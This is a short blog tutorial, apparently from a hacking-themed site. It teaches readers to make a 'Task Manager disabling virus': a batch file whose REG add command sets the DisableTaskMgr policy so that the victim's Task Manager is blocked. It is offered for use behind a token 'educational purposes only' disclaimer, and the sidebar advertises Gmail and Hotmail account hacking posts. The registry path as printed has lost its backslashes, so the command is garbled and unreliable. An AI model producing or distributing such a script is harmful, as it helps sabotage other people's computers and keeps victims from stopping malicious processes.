How to create a Task Manager disabling virus | Disable Task Manager


How to create a Task Manager disabling virus | Disable Task Manager

How to Create a task manager disabling virus

In this tutorial I am going to teach you how to create a Task Manager Disabling virus. This virus will disable Task manager using Registry Editor i.e. regedit. Read this post and post your feedback in comments. Do share this page with your friends help us to grow !

 

Steps:-

1)Copy the fllowing code to a batch file :-
@echo off
REG add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f
2) Save it as anyname.bat.


Explanation:-

1)REG add -it used to add registry to the windows.
2)HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem :- path of the registry
3)REG_DWORD :- data type
4)0: it is default value and means fasle. 1 stands for true.
if the dword value is0 the registry DisableTaskMgr is false andtask manager will work.
if the dword value is 1 the registry DisableTaskMgr is true and task managaer will be blocked.
5)So just change 0 and 1 to enable/disable the task manager.

NOTE:-This tutorial is for educational purposes only,Use at your own risk.I m not responsible for any miss happening

Comments

Popular posts from this blog

HACK GMAIL ACCOUNTS : GMAIL HACKER

HACK HOTMAIL ACCOUNTS : HOTMAIL HACKER

How to Test Suspicious Links Before Clicking Them